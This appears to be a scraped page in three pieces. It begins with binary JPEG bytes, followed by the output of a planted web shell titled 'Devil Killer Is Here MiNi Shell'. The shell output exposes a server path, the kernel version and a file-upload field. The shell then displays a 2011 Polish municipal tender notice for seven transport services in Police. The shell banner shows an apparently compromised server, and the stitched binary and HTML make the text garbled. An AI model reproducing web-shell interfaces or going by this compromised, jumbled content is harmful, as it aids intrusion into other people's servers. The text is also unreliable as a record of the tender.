JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/320511-N-2011.html

<p class="kh_header"><b>Police: Usługi transportowe 
(NR 1, 2, 3, 4, 5, 6, 7)
dla poszczególnych działów ZGKiM Police
w okresie 36 miesięcy</b><br>
<b>Numer ogłoszenia: 320511 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej , ul. Bankowa 18, 72-010 Police, woj. zachodniopomorskie, tel. 091 4311350, faks 091 3175037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zgkim.police.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi transportowe 
(NR 1, 2, 3, 4, 5, 6, 7)
dla poszczególnych działów ZGKiM Police
w okresie 36 miesięcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi transportowe 
(NR 1, 2, 3, 4, 5, 6, 7)
dla poszczególnych działów ZGKiM Police
w okresie 36 miesięcy :

Zał. 1a

Zestawienie potrzeb transportowych w ZGKiM Police

w dziale Technicznej Obsługi Budynków
i w dziale Obsługi Urządzeń Komunalnych : 
Nr  1.    samochód ciężarowy o ład. do 2 ton (np. multikar)

a)   Zatrudnienie przy eksploatacji budynków w dziale TOB:

-	wywóz gruzu po remoncie lokali,
-	przewożenie dużych elementów (drzwi, okna, ramki ogrodzeniowe, słupki, obudowy śmietników, urządzenia zabawowe, itp.),
-	rozwożenie narzędzi, piasku na okres zimowy, wywóz liści na wysypisko,
-	oczyszczanie piaskownic, wywożenie starego piasku i napełnianie piaskownic nowym piaskiem,
-	opróżnianie mieszkań po osobach zmarłych nie posiadających rodzin,
-	odśnieżanie i wywożenie śniegu (w szczególnych przypadkach, na jednorazowe zlecenie),
-	załadunek i rozładunek własny (kierowcy).

-	Planowane zatrudnienie - około  180 godzin miesięcznie

a)	Dodatkowe zatrudnienie w dziale OUK 
-	do wywozu nieczystości z cmentarzy, gdzie nie ma możliwości wjazdu inny środek transportu (ze względu na szerokość alejek),
-	załadunek i rozładunek własny (kierowcy).

-	Planowane dodatkowe zatrudnienie - około  30 godzin miesięcznie.

Płatność wg stawki za godzinę pracy.
Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Wymagana możliwość wjazdu w wąskie przejścia blisko budynków, nie powodując zniszczeń zieleni i chodników swoim ciężarem (szer. do 2,0 m),
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.
-	Kierowca nie może mieć przeciwwskazań lekarskich do czynności załadunkowych        (tj. ręcznego przenoszenia ciężarów o wadze jednostkowej do 50 kg) - oświadczenie  o braku przeciwwskazań wymagane będzie przed podpisaniem umowy .
Zał. 1b 

Zestawienie potrzeb transportowych w ZGKiM Police
w dziale Technicznej Obsługi Budynków :
Nr  2.	samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków od 600 do 1000 kg  i osób w liczbie 6 osób łącznie z kierowcą


a)  Zatrudnienie w dziale TOB (dla instalatorów): 

-	do przewozu pracowników przy robotach remontowych budynków, 
-	przewozu narzędzi, sprzętu i materiałów w opakowaniach,
-	pomoc w załadunku i rozładunku przewożonych towarów.


-	Planowane zatrudnienie: 
7,5 godziny dziennie w dni robocze.

Płatność wg stawki za godzinę pracy.
Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Możliwość przewozu w części osobowej pięciu pracowników,
-	Część towarowa oddzielona od części osobowej trwałą przegrodą,
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.
-	Kierowca nie może mieć przeciwwskazań lekarskich do czynności załadunkowych        (tj. ręcznego przenoszenia ciężarów o wadze jednostkowej do 50 kg) - oświadczenie                      o braku przeciwwskazań wymagane będzie przed podpisaniem umowy.








Zał. 1c

Zestawienie potrzeb transportowych w ZGKiM Police


w dziale Technicznej Obsługi Budynków
i w dziale Technicznym i Gospodarki Materiałowej (zaopatrzenie materiałowe)


Nr  3.  samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków ca 1500 kg i osób w liczbie 6 osób łącznie           z kierowcą


a)  Zatrudnienie w dziale TOB (dla budowlańców): 

-	do przewozu pracowników przy robotach remontowych budynków, 
-	przewozu narzędzi, sprzętu i materiałów w opakowaniach,
-	pomoc w załadunku i rozładunku przewożonych towarów.

b)  dodatkowe zatrudnienie w dziale Techn. i GM (zaopatrzenie materiałowe)
-	do przewozu zakupionych materiałów dla potrzeb poszczególnych działów ZGKiM (średnio 1 wyjazd w tygodniu do 5 godzin, miesięcznie ok. 20 godzin).
-	załadunek i rozładunek materiałów zakupionych o wadze jednostkowej do 50 kg nie wymagających pomocy innych osób - przez kierowcę.


-	Łączne planowane zatrudnienie - 8 godzin dziennie w dni robocze,

Płatność wg stawki za godzinę pracy.

Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Możliwość przewozu w części osobowej pięciu pracowników,
-	Część towarowa oddzielona od części osobowej trwałą przegrodą,
-	Skrzynia kryta plandeką,
-	Długość skrzyni min. 3,0 m,
-	Podłoga skrzyni powinna być płaska (bez nadkoli),
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.
-	Kierowca nie może mieć przeciwwskazań lekarskich do czynności załadunkowych        (tj. ręcznego przenoszenia ciężarów o wadze jednostkowej do 50 kg) - oświadczenie                      o braku przeciwwskazań wymagane będzie przed podpisaniem umowy.
Zał. 1d

Zestawienie potrzeb transportowych w ZGKiM Police


W dziale Technicznej Obsługi Budynków



Nr  4.  samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków ca 1500 -2500 kg  i osób w liczbie 5 osób łącznie z kierowcą


a)  Zatrudnienie w dziale TOB (dla dekarzy): 

-	do przewozu pracowników przy robotach dekarskich, 
-	przewóz drabiny, narzędzi, sprzętu, materiałów.


-	Planowane zatrudnienie - około 80 godzin na miesiąc.


Płatność wg stawki za godzinę pracy.

Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Możliwość przewozu w części osobowej czterech pracowników,
-	Część towarowa samochodu oddzielona od części osobowej trwałą przegrodą,
-	Skrzynia ładunkowa powinna mieć długość 3,50 - 4,50 m,
-	Załadunek i rozładunek przy otwarciu burt na boki i do tyłu,
-	Wysokość podłogi skrzyni załadunkowej od ziemi maksymalnie 0,80 m,
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.









Zał. 1e

Zestawienie potrzeb transportowych w ZGKiM Police


w działach Finansowo-Księgowym, Czynszów i Obsługi Wspólnot Mieszkaniowych, Spraw Pracowniczych



Nr  5.	samochód osobowo-towarowy typu kombi lub mini Van przeznaczony do przewozu 5 osób  łącznie z kierowcą


a)   Zatrudnienie w działach administracyjnych obejmujące: 

-	przewóz dokumentów do urzędów,
-	przewóz gotówki dla potrzeb obsługi kasowej,
-	obsługę administracyjną - zakupy druków, znaczków, biletów, itp.,
-	przewóz środków czystości, materiałów biurowych,
-	codzienny przewóz poczty i prasy,
-	wyjazdy kontrolne w teren na zlecenie działów administracji,
-	pomoc przy załadunku i wyładunku przewiezionych towarów.

-	Planowane zatrudnienie: 
5-6 godzin dziennie w dni robocze - w ciągu miesiąca ok. 144 godziny.

Płatność wg stawki za godzinę pracy.

Wymagania Zamawiającego:

-    Od kierowcy wymagana niekaralność, wiarygodność,
-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Możliwość przewozu  minimum 4 pracowników,
-	Estetyczny wygląd samochodu,
-	Wydzielona część bagażnika auta fabryczną kratą,
-	Całkowita ładowność auta 500 kg, 
-	Pojemność bagażnika minimum 500 litrów bez składania tylnych siedzeń.
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnej specyfice potwierdzone min.1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.




Zał. 1f

Zestawienie potrzeb transportowych w ZGKiM Police


W dziale Obsługi Urządzeń Komunalnych


Nr  6.	samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków od 600 do 1000 kg  i osób w liczbie 5 osób łącznie z kierowcą



a)	Zatrudnienie w dziale OUK 

-	do przewozu pracowników do obsługi pogrzebów i prac konserwacyjnych,
-	do przewozu materiałów i narzędzi, 
-	do przewozu pracowników do kontroli szaletów, kontroli oświetlenia ulicznego.


-	Planowane zatrudnienie - około 80 godzin na miesiąc.

Płatność wg stawki za godzinę pracy.


Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	w części osobowej przewóz pracowników - minimum 4 osoby,
-	część towarowa oddzielona od części osobowej trwałą przegrodą,
-	część towarowa może być zakryta na boki, z załadunkiem narzędzi i materiałów tylnymi drzwiami.
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min.1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.









Zał. 1g

Zestawienie potrzeb transportowych w ZGKiM Police


W dziale Obsługi Urządzeń Komunalnych 



Nr  7.	samochód ciężarowy z HDS - samowyładowczy lub wywrotka , przeznaczony konstrukcyjnie  do przewozu ładunków ca 5000 kg                                  i osób w liczbie 2 osób łącznie z kierowcą


b)	Zatrudnienie w dziale OUK:


-	wywóz śmieci z cmentarzy, 
-	przewóz materiałów sypkich,
-	przewóz ładowanych mechanicznie materiałów w sztukach i na paletach o ciężarze do 900 kg,
-	samodzielny załadunek śmieci i materiałów sypkich za pomocą HDS,
-	załadunek za pomocą HDS pojemników do selektywnej zbiórki odpadów.



-	Planowane zatrudnienie - około 80 godzin na miesiąc.

Płatność wg stawki za godzinę pracy.


Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy).
-	HDS o ładowności do 900 kg,
-	HDS z możliwością samodzielnego załadunku materiałów sypkich i śmieci,
-	HDS z zaczepami do załadunku pojemników,
-	burty samochodu otwierane na boki i tył,
-	wyładunek mechaniczny może być tylko od tyłu.
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych kat. C min. 5 lat.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo                       o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.
-	Kierowca nie może mieć przeciwwskazań lekarskich do czynności załadunkowych        (tj. ręcznego przenoszenia ciężarów o wadze jednostkowej do 50 kg) - oświadczenie                      o braku przeciwwskazań wymagane będzie przed podpisaniem umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> -	Wysokość  wymaganego  wadium:  500 zł (pięćset zł) na każdy środek transportu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	posiadający niezbędną  wiedzę i doświadczenie, tj:
	- którzy w okresie ostatnich trzech lat wykonali usługi transportowe w okresie min. 12 miesięcy dla minimum 1 zamawiającego, potwierdzone referencjami.
	
Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 2 do 	SIWZ p. 3 i 4:

3.	Wykaz wykonanych  w okresie ostatnich trzech lat kalendarzowych (lub w okresie krótszym, jeżeli okres działalności był krótszy) usług transportowych (usługi transportowe w okresie minimum 12 miesięcy dla minimum jednego zamawiającego) - wg zał. nr 6. 
4.	Dokumenty od poprzednich zamawiających potwierdzające, że usługi opisane w wykazie wg zał. nr 6 zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponujący środkami transportu spełniającymi wymagania określone w załączniku nr 1a-g do SIWZ.
	Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 2 do 	SIWZ p. 6:

6.	Informacje o oferowanym środku transportowym, który będzie użyty do wykonania zamówienia - wg zał. nr 7(a-g), z załączeniem kserokopii dowodu rejestracyjnego pojazdu, potwierdzającego aktualne badania techniczne pojazdu, oraz obowiązkowej polisy ubezpieczeniowej OC+NW (dla każdego środka transportu należy wypełnić osobny odpowiedni druk nr 7), a wykonawcy, którzy składają ofertę na transport Nr 7 zobowiązani są załączyć również kserokopię aktualnego badania HDS przez UDT.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponujący kierowcami spełniającymi wymagania określone w załączniku nr 1a-g do SIWZ.
	Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 2 do 	SIWZ p. 5:

5.	Informacja o kwalifikacjach kierowcy - wg zał. nr 7(a-g), z załączeniem kserokopii prawa jazdy, a dla wykonawców, którzy składają ofertę na transport Nr 7 również kserokopia uprawnień na obsługę HDS.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadający opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej               w zakresie prowadzonej działalności gospodarczej na kwotę min. 50.000 zł.
	Ocena spełnienia warunku na podstawie dokumentów wymaganych wg zał. nr 2 do 	SIWZ p. 7: 

7.	Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej                   w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (suma ubezpieczenia min. 50.000 zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dowód wniesienia wadium.

